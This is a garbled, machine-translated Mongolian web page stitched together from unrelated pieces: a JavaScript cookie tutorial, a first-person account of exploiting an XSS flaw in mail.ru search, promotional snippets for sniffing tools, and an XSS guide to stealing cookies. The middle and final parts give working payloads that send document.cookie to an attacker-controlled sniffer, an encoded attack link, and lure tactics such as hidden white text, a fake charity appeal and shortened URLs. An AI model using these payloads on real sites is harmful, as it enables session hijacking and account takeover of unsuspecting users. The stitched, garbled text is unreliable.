Күүки хулгайлах аргууд. Күүкигээс нууц үгээ хэрхэн гаргаж авах вэ Тэд юунд зориулагдсан бэ?

JavaScript нь хөтөч дээр күүкиг тохируулах, унших боломжийг олгодог. Энэ хичээлээр бид күүкитэй хэрхэн ажиллах талаар авч үзэхээс гадна оруулсан нэрийг санаж, нэвтрэх бүртээ харуулах энгийн хуудас хийх болно.

Күүки гэж юу вэ?

Күүки нь вэб хөтчөөр хадгалагддаг бага хэмжээний өгөгдөл юм. Тэд танд хэрэглэгчийн тухай тодорхой мэдээллийг хадгалах, түүнийг таны хуудсанд зочлох бүрд нь авах боломжийг олгодог. Хэрэглэгч бүр өөрийн гэсэн өвөрмөц күүкитэй байдаг.

Ер нь күүки нь вэб серверээс сайтад зочилсныг хянах, сайтад бүртгүүлэх, захиалга, худалдан авалтын талаарх мэдээллийг хадгалах зэрэг функцуудыг гүйцэтгэхэд ашиглагддаг. Гэсэн хэдий ч бид күүки ашиглахын тулд вэб серверийн програм зохион бүтээх шаардлагагүй. Бид тэдгээрийг JavaScript ашиглан ашиглаж болно.

document.cookie өмч.

JavaScript-д баримт бичгийн объектын күүкийн шинж чанарыг ашиглан күүкиг ханддаг. Та дараах байдлаар күүки үүсгэж болно.

Хадгалсан жигнэмэгийн багцыг дараах байдлаар аваарай:

Var x = document.cookie;

Күүки хадгалах, сэргээх талаар илүү дэлгэрэнгүй авч үзье.

Күүкийг хадгалж байна

Күүки хадгалахын тулд бид үүсгэхийг хүсэж буй күүкийн шинж чанарыг агуулсан текстийн мөрөнд document.cookie-г оноох шаардлагатай:

document.cookie = "нэр = утга; хугацаа нь = огноо; зам = зам; домэйн = домэйн; аюулгүй";

Шинж чанаруудыг хүснэгтэд үзүүлэв:

Үл хөдлөх хөрөнгийн тодорхойлолт Жишээ

нэр = утга	Күүкийн нэр болон түүний утгыг тохируулна.	хэрэглэгчийн нэр = Вася
дуусах= огноо	Күүкийн дуусах хугацааг тохируулна. Огноо нь Date объектын toGMTString() аргаар буцаасан форматтай байх ёстой. Хугацаа дуусахыг заагаагүй бол хөтөч хаагдах үед күүки устах болно.	хугацаа дуусна= 13/06/2003 00:00:00
зам = зам	Энэ сонголт нь күүки хүчинтэй байх сайт дээрх замыг тохируулна. Зөвхөн заасан замаас баримт бичиг күүки утгыг авах боломжтой. Ихэнхдээ энэ өмчийг хоосон орхидог бөгөөд энэ нь зөвхөн күүкийг тохируулсан баримт бичигт хандах боломжтой гэсэн үг юм.	зам =/демо/
домэйн=домайн	Энэ сонголт нь күүки ажиллаж буй домэйныг тохируулна. Зөвхөн заасан домэйны сайтууд күүки утгыг хүлээн авах боломжтой. Энэ өмчийг ихэвчлэн хоосон орхидог бөгөөд энэ нь зөвхөн күүкийг тохируулсан домэйнт хандах боломжтой гэсэн үг юм.	домэйн=вэбсайт
аюулгүй	Энэ сонголт нь сервер рүү күүки илгээхийн тулд SSL ашиглахыг хөтчид хэлдэг. Маш ховор хэрэглэгддэг.	аюулгүй

Күүки тохируулах жишээг харцгаая:

document.cookie = "хэрэглэгчийн нэр=Вася; хугацаа дуусна=2011-02/15 00:00:00";

Энэ код нь хэрэглэгчийн нэр күүки тохируулж, түүнд "Вася" гэсэн утгыг оноож, 2011 оны 2-р сарын 15 хүртэл хадгалагдах болно (Европ цагийн форматыг ашигладаг!).

var cookie_date = new Date (2003, 01, 15); document.cookie = "хэрэглэгчийн нэр=Вася; хугацаа дуусна=" + cookie_date.toGMTString();

Энэ код нь өмнөх жишээтэй яг адилхан үйлдэл хийх боловч огноог тохируулахдаа Date.toGMTString() аргыг ашигладаг. Date объект дахь сарын дугаарлалт 0-ээс эхэлдэг, өөрөөр хэлбэл 2-р сар 01 гэдгийг анхаарна уу.

Document.cookie = "logged_in=yes";

Энэ код нь logged_in күүкийг тохируулж, "тийм" гэж тохируулна. Дуусах шинж чанарыг тохируулаагүй тул хөтөч хаагдах үед күүки устах болно.

var cookie_date = new Date(); // Одоогийн огноо, цаг cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; expires=" + cookie_date.toGMTString();

Энэ код нь logged_in күүкийг тохируулж, хадгалах мөрийг одоогийн цагаас нэг секундын өмнөх цаг руу тохируулдаг - энэ үйлдэл нь күүкийг шууд устгах болно. Күүки устгах гар аргаар!

Күүкийн утгыг дахин кодлож байна!

Бос зай, хоёр цэг зэрэг тэмдэгтүүдийг зөв хадгалах, харуулахын тулд күүки утгыг дахин кодлох хэрэгтэй. Энэ үйлдэл нь хөтөч утгыг зөв тайлбарлахыг баталгаажуулдаг. Lego кодчилол нь JavaScript escape() функцээр хийгддэг. Жишээлбэл:

document.cookie = "username=" + escape("Vasya Pupkin") + "; expires=02/15/2003 00:00:00"; Күүкийг тохируулах функц

Хэрэв бид утгыг дахин кодлох, document.cookie мөрийг үүсгэх зэрэг энгийн үйлдлүүдийг гүйцэтгэх тусгай функц бичвэл күүки тохируулах нь илүү хялбар байх болно. Жишээлбэл:

Функцийн багц күүки (нэр, утга, exp_y, exp_m, exp_d, зам, домэйн, аюулгүй) ( var cookie_string = name + "=" + escape (утга); if (exp_y) ( var expires = new Date (exp_y, exp_m, exp_d) ); cookie_string += "; expires=" + expires.toGMTString( ) if (зам) cookie_string += "; path=" + escape (зам) if (domain)); domain=" + escape); (domain if (аюулгүй) cookie_string += "; security.cookie = cookie_string )

Функц нь күүкийн өгөгдлийг аргумент болгон авч, дараа нь тохирох мөрийг үүсгэж, күүкийг тохируулна.

Жишээлбэл, хүчинтэй хугацаагүй күүки тохируулах:

set_cookie("хэрэглэгчийн нэр", "Вася хулуу"); set_cookie ("хэрэглэгчийн нэр", "Vasya Pupkin", 2011, 01, 15);

Хадгалах хугацаа, сайтын домэйн, SSL ашиглан күүки тохируулах, гэхдээ замгүй:

set_cookie ("хэрэглэгчийн нэр", "Vasya Pupkin", 2003, 01, 15, "", "сайт", "аюулгүй"); Күүкийг устгах функц.

Күүкитэй ажиллах өөр нэг ашигтай функцийг доор үзүүлэв. Энэ функц нь хүчинтэй байх хугацааг одоогийн цагийн утгаас нэг секундын өмнө тохируулснаар хөтчөөс күүкиг "устгах" болно.

функц устгах_күүки (күүки_нэр) ( var cookie_date = шинэ огноо (); // Одоогийн огноо, цаг cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; expires=" + cookie_date.toGMTString ();

Энэ функцийг ашиглахын тулд та устгах ёстой күүкийн нэрийг л өгөх хэрэгтэй:

Устгах_күүки("хэрэглэгчийн нэр");

Күүкийн утгыг авч байна

Одоогийн баримт бичигт урьдчилан тохируулсан күүкийн утгыг авахын тулд та document.cookie шинж чанарыг ашиглах шаардлагатай:

Var x = document.cookie;

Энэ нь цэгтэй таслалаар тусгаарлагдсан нэр/утга хосуудын жагсаалтаас бүрдэх мөрийг буцаана хүн бүродоогийн баримт бичигт хүчинтэй күүки. Жишээлбэл:

"хэрэглэгчийн нэр = Вася; нууц үг = abc123"

Энэ жишээнд урьдчилан тохируулсан 2 күүки байна: хэрэглэгчийн нэр нь "Вася" утгатай, нууц үг нь "abc123" гэсэн утгатай.

Күүкийн утгыг авах функц

Ер нь бидэнд нэг удаад зөвхөн нэг күүкиний үнэ цэнэ хэрэгтэй. Тиймээс күүки мөрийг ашиглахад тохиромжгүй! Документ.күүки мөрийг боловсруулдаг функц нь зөвхөн тухайн агшинд сонирхож буй күүкиг буцаадаг:

get_cookie (күүки_нэр) функц ( var үр дүн = document.cookie.match ("(^|;)?" + күүкийн_нэр + "=([^;]*)(;|$)"); хэрвээ (үр дүн) буцаана (боломжгүй). (үр дүн)); тэгэхгүй бол null буцаана)

Энэ функц нь ердийн илэрхийлэл ашиглан сонирхож буй күүкиний нэрийг олох ба дараа нь утгыг буцаадаг бөгөөд үүнийг unescape() функцээр боловсруулж, ердийн тэмдэгтийн хэлбэрт дахин кодчилдог. (Хэрэв күүки олдохгүй бол null буцаана.)

Энэ функцийг ашиглахад хялбар. Жишээлбэл, хэрэглэгчийн нэрийн күүкиний утгыг буцаахын тулд:

Var x = get_cookie("хэрэглэгчийн нэр");

Энгийн хэрэглээний жишээ

Энэ жишээнд бид таны анхны зочлоход таны нэрийг асуух хуудас хийсэн бөгөөд энэ нь таны нэрийг күүки дотор хадгалж, дараагийн зочлоход харуулах болно.

Хуудсыг шинэ цонхонд нээнэ үү. Таныг анх удаа зочлоход танаас нэрээ оруулаад күүки дотор хадгалахыг хүсэх болно. Хэрэв та энэ хуудсанд дахин зочилвол дэлгэцэн дээр таны оруулсан күүкийн нэрийг харуулах болно.

Күүкийн хувьд бид хадгалах хугацааг одоогийн өдрөөс хойш 1 жилээр тогтоосон бөгөөд энэ нь таныг хаасан ч хөтөч таны нэрийг хадгалах болно гэсэн үг юм.

Та эх сурвалжийг харах сонголтыг сонгосноор хөтчийнхөө хуудасны кодыг харж болно. Кодын гол хэсэг нь энд байна:

if (! get_cookie ("хэрэглэгчийн нэр")) ( var username = prompt ("Нэрээ оруулна уу", ""); if (хэрэглэгчийн нэр) ( var current_date = new Date; var cookie_year = current_date.getFullYear () + 1; var cookie_month = current_date.getMonth(); var cookie_day = current_date.getDate(); set_cookie("хэрэглэгчийн нэр", хэрэглэгчийн нэр, күүки_жил, күүки_сар) ) else( var username = get_cookie("хэрэглэгчийн нэр"); document.write ("Сайн уу. , " + хэрэглэгчийн нэр + ", хуудсанд тавтай морил!"); document.write("
Миний талаар март!"); }

Энэ хичээл нь зочдын талаарх мэдээллийг хадгалахын тулд JavaScript дээр күүки хэрхэн ашиглахыг харуулсан. Анхаарал тавьсанд баярлалаа! :)

Мэдээллийн аюулгүй байдлын асуудалд зориулсан үнэ төлбөргүй арга хэмжээнд оролцохыг санал болгов. Энэ арга хэмжээ манай хотод болсон тул би заавал тийшээ явах хэрэгтэй гэж шийдсэн. Эхний хичээлийг XSS гэх мэт вэб сайтуудын сул талуудад зориулав. Хичээлийн дараа би олж авсан мэдлэгээ бодит нөхцөлд нэгтгэх хэрэгтэй гэж шийдсэн. Би өөрийн хоттой холбоотой хэд хэдэн сайтыг сонгож, скриптээ бүх хэлбэрт оруулахыг оролдож эхлэв. Ихэнх тохиолдолд скриптийг шүүсэн. Гэхдээ "анхаарал" асаж, миний мессеж гарч ирэв. Би олсон сул талыг администраторуудад мэдэгдсэн бөгөөд тэд бүгдийг хурдан зассан.

Эдгээр өдрүүдийн нэгэнд mail.ru дээрх хамгийн сүүлийн үеийн захидлуудыг шалгаж байх үед шуудангийн хайрцган дахь захидал хайх маягт миний анхаарлыг татав. Хааяа энэ хайлтыг ашиглан хуучин захидлуудаасаа өөрт хэрэгтэй зүйл олдог байлаа. За, сүүлийн хоёр өдөр би "анхаарал"-аа хаа сайгүй оруулснаас хойш энэ хайлтын маягт руу гар минь рефлексээрээ хүрч ирлээ. Би скриптийнхээ кодыг бичээд Enter дарна. Дэлгэцэн дээр гашуун танил мессежийг хараад гайхсанаа төсөөлөөд үз дээ...

Нээлттэй InfoSec өдрүүдийн лекц дээр илтгэгч хэлэхдээ, програмистууд энэ төрлийн эмзэг байдлын талаар нэлээд эргэлзэж байгаа бөгөөд "Анхаарах уу? За яахав? Энэ аюултай биш" гэжээ. Хэрэв бусад сайтууд дээр би зөвхөн энэ цонхонд өөрийн мессежээр сэтгэл хангалуун байсан бол энэ тохиолдолд би цаашаа явж, ийм "анхаарал" -аас юу гарч болохыг харуулахаар шийдсэн.

Тиймээс, скрипт ажилладаг бөгөөд энэ нь сул тал байгаа гэсэн үг юм. Тиймээс та өөр скрипт ажиллуулахыг оролдож болно. Жишээлбэл, өөр хэрэглэгчийн күүкийг бидэнд илгээдэг скрипт. Скрипт ажиллахын тулд бид хэрэглэгчийг өөрийн скриптийг ажиллуулахыг албадах хэрэгтэй. Үүнийг түүнд тохирох холбоос бүхий захидал илгээх замаар хийж болно, түүн дээр дарсны дараа шуудангийн хайрцгийг хайж, бидэнд хэрэгтэй кодыг гүйцэтгэх болно.

Эмзэг байдлын механикийг ойлгохын тулд хэсэг хугацаа, маш их туршилт хийсэн. Заримдаа скрипт ажиллаж, заримдаа шүүгдэж байсан. Хэсэг хүчин чармайлт гаргасны дараа үсгийг хайх нь эерэг үр дүнд хүрсэн тохиолдолд л скрипт 100% ажилладаг болохыг эмпирик байдлаар тогтоосон. Өөрөөр хэлбэл, хэрэглэгч манай скриптээр хайлт хийх үед өгөгдсөн параметрийн дагуу түүний шуудангийн хайрцагт дор хаяж нэг үсэг байх шаардлагатай. Үүнийг зохион байгуулах нь тийм ч хэцүү биш юм.

Түүнчлэн, "анхаарал" -ын оронд күүкиг манай үнэрлэгч рүү шилжүүлэх скрипт хэрэгтэй. Бид энэ скриптийг тусдаа файлд бичиж, хайлтандаа ачаална. Би шаардлагатай код бүхий test.js файлыг үүсгээд хостинг руу байршуулсан. Скрипт код нь иймэрхүү байна:

Img=шинэ зураг();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
функц F() (
байршил="http://www.solife.ru";
}
setTimeout(F, 5000);

Энд би юуг тодруулах гэсэн юм. Өөрсдийгөө халдагчийн оронд тавъя. Бидэнд хэрэглэгч холбоос дээр дарах хэрэгтэй. Би түүнийг яаж ингэж албадах вэ? Та алтны уулс амлаж, хүлээн авахын тулд манай сайтын холбоосыг дагах хэрэгтэй. Гэхдээ бүтэхгүй гэж бодож байна. Хүмүүс үүнд автахаа больсон (би өөрөө ийм захидлуудыг уншихгүйгээр байнга устгадаг). Тиймээс байгальд байсаар байгаа учраас бид хүний ​​өрөвдөх сэтгэлээр тоглох болно. Ховордсон амьтдыг аврахын төлөө сайтад саналаа өгөхийг биднээс хүсч байна. Эхлээд бид күүки авч, дараа нь хэрэглэгчийг санал өгөх сайт руу дахин чиглүүлэх болно. Дахин чиглүүлэх хугацааг 5 секунд гэж тохируулсан, эс тэгвээс күүкиг үнэрлэгч рүү шилжүүлэх цаг байхгүй байсан тул хэрэглэгч амьтдын тухай сайт руу шууд чиглүүлэв. "Анхааруулга" -ын оронд би дараах скриптийг ашигласан:

Би зохиолоо дуусгаад захиа бичиж эхлэв. Би ийм зүйл бодож олсон:


Энэ нь нэлээд эелдэг байсан ч би нөхцөл байдлыг бодит байдалд аль болох ойртуулахыг хичээсэн. Захидлын төгсгөлд скрипт бүхий мөр байгаа бөгөөд энэ нь хайлт хийхэд бидний захидал олдох болно. Мөр нь шаардлагагүй асуултуудыг гаргахгүйн тулд би үүнийг цагаанаар будсан. Би мөн "http" гэсэн үгэнд хоосон зай тавьсан бөгөөд ингэснээр мөрийг танихгүй, холбоос болгон хувиргахгүй. Үгүй бол скриптийн мөр нь цагаан фонтоор бичигдсэн байсан ч холбоосыг хүлээн авагч цэнхэр өнгөөр ​​тодруулах бөгөөд бидэнд энэ шаардлагагүй болно. Ухаалаг хайлт нь хоосон зай байгаа хэдий ч энэ мөрийг олж, таних болно.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Би скриптэд URL кодчилол ашигласан тул юу ч шүүгдээгүй. Би мөн хайлтын хувьд "q_folder=0" параметрийг нэмсэн бөгөөд ингэснээр хайлт "Ирсэн имэйл" хавтсанд явагдана.

Захидал бэлэн байна, бид илгээнэ үү. Би хоёр дахь шуудангийн хайрцгаа хүлээн авагчтай ижил үйлчилгээнд ашигласан. Нөгөө хайрцагт юу ирснийг харцгаая.

Манай скриптийн текст арын дэвсгэртэй холилдсон тул харагдахгүй байна. Холбоос дээр дараад юу болохыг харцгаая. Хэрэглэгчийг бидний заасан параметр дээр үндэслэн имэйлийн хайлтын илэрц рүү шилжүүлнэ. Бидний илгээсэн захидал хайлтын үр дүнд харагдаж байна. Энэ үед манай скрипт аль хэдийн ажиллаж, хэрэглэгчийн күүкиг үнэрлэгч рүү илгээсэн. 5 секундын дараа (хугацаа нь скриптийн тохиргооноос хамаарна) хэрэглэгч санал өгөх сайт руу дахин чиглэгддэг.

Би sniff.txt файлаа шалгана:

Миний зорилго бол бусдын хайрцгийг хулгайлах эсвэл тэдэнд хандах эрх олж авах явдал биш учраас би түүхийг энд дуусгая. Гэхдээ онолын хувьд та жигнэмэгээ өөр хүнийхээр сольж, хэн нэгний шуудангийн хайрцагт хандах боломжтой. Ерөнхийдөө хэрэв халдлага үйлдэгч нь байг сонирхож байгаа бол тэрээр хүлээн авсан мэдээллээр ашиглах боломжийг олох болно.

Би Сергей Беловт баярлалаа гэж хэлмээр байна (

Миний нэг найз нэг сайтын нууц үгийг мартсан байна. Гэсэн хэдий ч тэрээр өмнө нь нэвтэрч орохдоо Google Chrome хөтчийн "Намайг санаарай" гэсэн нүдийг шалгасан нь өөрийн бүртгэлээр сайт руу нэвтрэх боломжийг олгосон юм. Энэ ид шидийн төлөвийг өөр компьютерт шилжүүлэх боломжтой юу гэсэн асуулт надад ирсэн. Мэдээжийн хэрэг нууц үгээ солих эсвэл сэргээх нь илүү зөв байх байсан, гэхдээ найз маань энэ хэрэгт хамааралгүй шалтгаанаар үүнийг хийж чадаагүй.

Даммигийн хувьд intercepter-ng-г хэрхэн ашиглах вэ

Орчин үеийн олон төрлийн програм хангамжийг сонгох боломжтой хэдий ч Android-д intercepter ng-ээс илүү сайн хакердах програм олоход хэцүү байдаг. Энэ бүтээгдэхүүний давуу талыг харуулсан эхний шалгуур бол түүний бодит гүйцэтгэл юм. Сүлжээнд санал болгож буй шунагч нарын ихэнх нь заасан үүргээ гүйцэтгэдэггүй зүгээр л дуураймал юм.

Дараагийн эерэг хүчин зүйлүүд бол хэрэглээний олон талт байдал, өргөн хүрээний хэрэглэгчдийн хамрах хүрээ юм.

Компьютерийн тусламж 939-29-71

Дарааллаар нь эхэлцгээе. Күүки буюу "күүки" нь маш жижиг текст файлууд - мэдээлэл бүхий хавчуурга юм.

Вэб сервер нь энэ мэдээллийг хэрэглэгчийн хөтөч рүү дамжуулдаг. шаардлагатай бол энэ мэдээллийг хаана хадгалах. Тодорхойгүй. За. Сайн байна.

Би үүнийг илүү хялбар болгохыг хичээх болно. Хараач. Та аль ч вэб сайтад бүртгүүлсэн байна.

Бүртгүүлэх үед эдгээр "күүки" үүсдэг.

Тэд ийм л байна.

Күүки Каджер

Энэ програм нь WiFi сүлжээн дэх траффикийг сонсож, күүкиг таслан зогсоож, хэрэглэгчийн сессийг таны хөтөч дээр давтаж, түүний итгэмжлэлээр хүсэлтийг давтан хийдэг. Зохиолч Мэттью Салливан 9-р сарын 30-нд Дербиконы хакеруудын бага хурал дээр хөтөлбөрийн талаар илтгэл тавьсан. Мэттью Салливан үг хэлэх үеэрээ WiFi-ээр дамжуулан хурлын зочдын нэг Google-тэй хийсэн хамгаалалтгүй сессийг таслан зогсоов.

Хэрхэн жигнэмэг хулгайлах вэ

Хэрэв та вэбсайтын хуудсанд байхдаа Firefox эсвэл Opera хөтчийн хаягийн мөрөнд дараах текстийг оруулбал: javaсript:document.write(document.cookie); Дараа нь та дараах зүйлийг харах болно: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Анхаар! .

Сайт хоорондын скрипт бичих бүрэн гарын авлага

XSS нь бусад хэрэглэгчдийн үзэж буй вэб хуудсанд үйлчлүүлэгч талын скрипт оруулах боломжийг олгодог програм хангамжийн эмзэг байдлын төрөл юм. вэб рүү - програмууд (хөтөчийн аюулгүй байдлын хязгаарлалтыг тойрч гарах замаар)" гэсэн бөгөөд энэ нь халдагчид бусад хэрэглэгчдийн үзэж буй вэб хуудсанд клиент скрипт оруулах боломжийг олгодог.

Күүки болон сесс хоорондын ялгаа

Саяхан би вэбсайтад хэрэглэгчдийг хэрхэн бүртгүүлэх, зөвшөөрөл олгох талаар нийтлэл бичсэн.

". Энэ нийтлэлд би сесс болон күүки хоёрын ялгааг задлах болно. Ингэснээр та эцэст нь сонголтоо хийх боломжтой болно.

Күүки. Үгүй ээ, энэ нь жигнэмэгийн тухай огт биш, таны аюулгүй байдлын тухай юм. Тиймээс та өөр хүний ​​​​компьютер дээрх өөрийн дуртай "vkontakte" сайт руу (эсвэл жишээлбэл, шуудан харна уу) очиж, "нууц үгээ хадгалах" сонголтоос татгалзаж, шуудангаар баяртайгаар харж, яваарай. Та одоо өөрийн нэрээр олон нийтийн сүлжээ эсвэл имэйлээр нэвтэрч болно гэж бүү бодоорой.

Би нууц үгээ таны мэдэлгүйгээр санаж байгаа програмын нөхцөл байдлыг авч үзэхгүй байна. Энэ бол аль хэдийн санаатай хакердсан үйлдэл бөгөөд та ийм зүйл тохиолдож магадгүй гэж сэжиглэж магадгүй бөгөөд ийм компьютер дээр дуртай сайт руугаа орохгүй байх болно. Гэхдээ бид энгийн хүний ​​сониуч байдлын тухай ярьж болно - та найз нөхөддөө зочилж байсан бөгөөд гэнэт тэд таны захиаг унших боломжийг олж авдаг. Тэд энэ боломжоос татгалзана гэдэгт итгэлтэй байна уу? Ямар нэг юм гарч ирэх вий гэж айхгүй байна уу? Ямар ч байсан би ёс суртахууны асуултуудыг хойш тавьж, компьютер дээр мэдээлэл хэрхэн хадгалагдаж байгаа талаар л ярих болно, та одоо нууц үг асуухгүйгээр зарим сайт руу нэвтрэх боломжтой.

Күүкийг хэрхэн хулгайлах вэ

Мөн энэ технологийн нэр нь жигнэмэг юм.

Эндээс л бүх зүйл эхэлсэн. Таны сайтуудыг (үүнийг оруулаад) үзэх http протокол нь холболтыг хадгалах боломжийг эхэндээ заагаагүй болно. Өөрөөр хэлбэл, та сайт руу хүсэлт илгээж, хариу хүлээн авч, дэлгэцэн дээр гарч ирэх бөгөөд дараа нь сервер таны талаар юу ч санахгүй байна. Энэ нь мэдээжийн хэрэг, сайт нь зөвхөн мэдээллийн чанартай бөгөөд таны тухай юу ч санахгүй байх нь сайн хэрэг, гэхдээ бид Вэб 2.0-ийн эрин үед амьдарч байна 😉 Протоколын байгалийн хөгжил бол POST болон GET хүсэлтүүд бөгөөд зарим өгөгдөл илгээх үед сервер үүнийг өгөгдлийн сангийн өгөгдөлд бичих боломжтой боловч энэ нь хангалтгүй юм.

Маш энгийн жишээг авч үзье. Форум. Тэгэхээр та бүртгүүлсэн бөгөөд форум дээр ийм ийм нууц үгтэй ийм хэрэглэгч байна, бусад нэмэлт өгөгдөлтэй гэсэн нийтлэл байна. Харин одоо та форум руу ороод нэвтэрч орно - нууц үгээ оруулна уу. Хаа нэгтээ таныг нэвтэрсэн гэсэн мэдээлэл байх ёстой. Сервер дээр үү? Мэдээж үгүй! Таны компьютерээс зөвшөөрөл авсан тухай мэдээллийг серверт хадгалах боломжгүй - энэ нь таныг өөр хэн нэгнээс ялгах боломжгүй (таны IP хаяг ч таныг танихгүй)! Тиймээс зөвшөөрөл авсан тухай мэдээлэл таны компьютерт хадгалагдах ёстой. Энэ бол жигнэмэг, тийм л зүйлд зориулагдсан юм.

Күүки нь таны зочилсон сайтын талаарх мэдээллийг хадгалдаг таны компьютер дээрх жижиг бичлэг юм. Нэвтрэх үед ижил төстэй оруулга үүсгэгдсэн бөгөөд үүний дараа та форумыг тойрон алхах боломжтой бөгөөд энэ нь таныг таних болно. Гэсэн хэдий ч, энэ нь аль хэдийн автоматаар тохиолдох болно - күүкид хадгалагдсан мэдээллийн ачаар - та форумын үндсэн администратор гэж дүр эсгэх нь нууц үг шалгахыг давж гарахгүй хэвээр байх болно.

Одоо бид энэ нийтлэл эхэлсэн газар руу буцаж болно. Хэрэв та нууц үгээ хадгалалгүйгээр хаа нэгтээ нэвтэрсэн бол компьютер дээр энэ нөөцөд зөвшөөрөлгүйгээр өөрийн нэрээр нэвтрэх боломжийг олгодог оруулга үүссэн байж магадгүй юм. Хэсэг хугацааны дараа ийм оруулга өөрөө хуучирсан болно, гэхдээ та үүнийг хүчээр арилгах боломжтой. Хөтөч бүр үүнийг өөр өөрөөр хийдэг тул би үүнийг өөрийн дуртай Google Chrome-д хэрхэн хийхийг харуулах болно. Параметрүүдийг нээх

"Нарийвчилсан" таб руу очоод "күүки харуулах" товчийг олоорой

Одоо мэдээж та бүх күүкиг устгаж болно, гэхдээ энэ нь компьютер эзэмшигчийг бухимдуулж магадгүй юм. Тиймээс, жишээлбэл, дээд талбарт та сонирхож буй сайтынхаа нэрийг оруулж болно

Дараа нь та зөвхөн энэ сайттай холбоотой күүкиг устгах боломжтой. Та минийх дээр туршиж үзэж болно. Гэсэн хэдий ч, хэрэв та миний форум руу нэвтэрч, дараа нь күүкигээ арилгавал нэвтрэх мэдээлэл мартагдах болно. Оролдоод үз!

сэтгэгдлүүдээр дэмжигдсэн

1. XSS гэж юу вэ?
XSS-ийн эмзэг байдал нь хуудасны үндсэн хэсэгт дурын JavaScript код оруулах боломжийг олгодог. XSS халдлага нь серверт бус харин үйлчлүүлэгчид нөлөөлдөг гэдгээрээ бусдаас (жишээ нь, SQL injection эсвэл PHP injection) ялгаатай.

жигнэмэг хэрхэн хулгайлах вэ

Үүний тусламжтайгаар та өгөгдлийн сангийн хүснэгтүүдийг үзэх, бүрхүүл ачаалах гэх мэт боломжгүй. XSS-ийн хамгийн түгээмэл хэрэглээ бол күүки хулгайлах явдал юм.
Күүки нь вэб серверээр үүсгэгдсэн, хэрэглэгчийн компьютер дээр файл хэлбэрээр хадгалагддаг жижиг өгөгдлийн хэсэг юм. Ихэвчлэн күүки нь данс хадгалахад ашиглагддаг ба ихэнхдээ шифрлэгдсэн нууц үг, нэвтрэх нэр, сессийн ID-г агуулдаг (хэдийгээр үргэлж биш ч)
XSS нь идэвхтэй, идэвхгүй гэсэн хоёр төрөлтэй.

Идэвхгүй XSS нь хохирогчоос javascript код агуулсан холбоос дээр дарах зэрэг шууд харилцан үйлчлэлийг шаарддаг. Энэ төрлийн XSS-г ашиглахдаа SI (Нийгмийн инженерчлэл)гүйгээр хийх боломжгүй.

Идэвхтэй XSS нь хохирогчийн оролцоог шаарддаггүй бөгөөд зөвхөн XSS-г агуулсан хуудсанд зочлоход хангалттай. Идэвхтэй XSS нь жишээлбэл форум, чат, мэдээ нэмэх гэх мэт мессежүүд байж болно.

2. XSS хайх
Энэ догол мөрөнд би xss-г хэрхэн олохыг танд хэлэх болно

2.1.Идэвхгүй XSS
Идэвхгүй XSS-г олохын тулд оролтын маягтанд alert('xss') гэж орлуул, хэрэв скрипт ажиллаж, "xss" гэсэн мессеж гарч ирвэл эмзэг байдал байгаа болно, хэрэв скрипт ажиллахгүй бол ">alert" гэж оролдож болно. (), энэ нь магадгүй хамгийн нийтлэг xss-ийн эмзэг байдал юм. Хэрэв нэг нь ч, нөгөө нь ч ажиллаагүй бол эмзэг байдал байхгүй байх магадлалтай.
Нэг жишээ авч үзье.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Та "хайх" маягтыг харж байна уу? тэнд ">alert()" оруулаад "хайх" дээр дарна уу.
Xss бүхий цонх гарч ирэх бөгөөд энэ нь xss байгаа гэсэн үг юм (Магадгүй та энэ нийтлэлийг унших үед энэ xss аль хэдийн устгагдсан байх болно).

2.2.Идэвхтэй XSS
Ийм css нь жишээлбэл, профайлын талбарт, мэдээний гарчиг болон мэдээний өөрөө (бага давтамжтай), html-г идэвхжүүлсэн форум/чат өрөө/зочны өрөөнүүдийн зурваст мэдээ нэмэх үед байж болно. Энд бүх зүйл энгийн, бид өмнөх дэд догол мөрний скриптийг талбарт оруулдаг бөгөөд хэрэв мессеж дэлгэц дээр гарч ирвэл эмзэг байдал байгаа болно.
Хэлэлцүүлэг дээрх BB шошгон дээрх xss-ийг харцгаая.
Та javascript кодыг шошгонд оруулахыг оролдож болно, жишээ нь:
javascript: дохиолол ('xss')
Зарим шошго нь параметртэй, жишээ нь шошгонд dynsrc болон lowsrc параметрүүд байдаг тул кодыг дараах байдлаар орлуулахыг оролдъё:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)
Хэрэв скрипт ажилласан бол xss байгаа

3. XSS ашиглан күүки хулгайлах
Одоо хамгийн амттай нь))))
Күүки хулгайлахын тулд бидэнд вэб sniffer хэрэгтэй, та өөрийн хостинг дээр ямар нэгэн төрлийн sniffer суулгаж болно, эсвэл одоо маш олон байгаа онлайн sniffer ашиглаж болно.
Идэвхгүй XSS-ээр күүки хулгайлахын тулд хохирогч хортой холбоосыг дагаж мөрдөх ёстой. Күүки хулгайлахын тулд бид alert('xss') оронд өөр скрипт ашиглах болно:
img = шинэ зураг();


бид скриптийг холбоос руу орлуулж, хохирогчийг дагаж мөрдөж, үнэрлэгчийн бүртгэлийг харж, баярлаарай.
Нэг жишээ авч үзье.
Өмнөх догол мөрөөс Rambler дээрх XSS-г авч үзье.
Бид оруулдаг
">
img = шинэ зураг();
img.src = "sniffer зургийн хаяг"+document.cookie;

хайлтын маягтаас "хайх" дээр дарж, хаягийн талбарыг хараад:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Бид энэ холбоосыг хохирогч руу илгээж, күүки идээрэй.
Ийм холбоосыг хараад хохирогч ямар нэг зүйлийг сэжиглэж магадгүй тул кодлохыг зөвлөж байна
">img = new Image();img.src = "sniffer зургийн хаяг"+document.cookie;
URL дээр эсвэл http://tinyurl.com/ гэх мэт үйлчилгээг ашиглах
Идэвхтэй XSS рүү шилжье, энд бүх зүйл энгийн, alert()-ын оронд бид img = new Image();img.src = "шиншлэгч зургийн хаяг"+document.cookie оруулна;

